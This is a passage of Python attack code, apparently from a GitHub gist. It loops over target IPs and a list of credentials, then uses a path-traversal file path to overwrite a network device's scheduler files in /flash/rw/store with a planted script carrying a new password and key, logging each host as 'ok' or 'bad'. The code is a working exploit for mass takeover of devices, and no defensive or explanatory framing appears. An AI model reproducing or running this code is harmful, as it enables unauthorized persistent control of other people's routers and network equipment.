shed, shedidx = make_sheduller(shed, shedidx, get_script(ip, part, newpass, keybase58)) | |
for user_pass_one in user_pass: | |
if user_pass_one[0] == 'f': | |
fg1 = save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.dat', shed, False) | |
fg2 = save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.idx', shedidx, True) | |
if fg1 and fg2: | |
fg = True | |
break | |
if not fg: | |
for user_pass_one in user_pass: | |
if user_pass_one[0] != 'f': | |
fg1 = save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.dat', shed, False) | |
fg2 = save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.idx', shedidx, True) | |
if fg1 and fg2: | |
fg = True | |
break | |
if fg: | |
log(ip + ' - ok') | |
else: | |
log(ip + ' - bad') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment